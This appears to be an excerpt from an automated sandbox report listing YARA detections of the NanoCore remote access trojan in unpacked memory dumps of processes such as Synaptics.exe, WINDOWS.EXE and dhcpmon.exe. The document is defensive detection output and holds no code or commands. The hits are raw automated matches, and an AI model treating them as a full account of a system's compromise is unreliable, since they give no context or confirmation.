            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
